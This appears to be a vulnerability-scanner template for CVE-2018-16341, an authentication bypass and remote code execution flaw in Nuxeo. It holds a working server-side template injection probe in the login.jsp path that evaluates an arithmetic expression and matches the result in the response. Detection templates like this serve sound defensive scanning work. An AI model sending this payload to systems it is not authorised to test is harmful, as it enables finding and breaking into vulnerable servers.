id: cve-2018-16341 info: name: Nuxeo Authentication Bypass Remote Code Execution author: madrobot severity: high description: Nuxeo Authentication Bypass Remote Code Execution < 103 using a SSTI requests: - method: GET path: - "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml" matchers: - type: word words: - "31333333337" part: body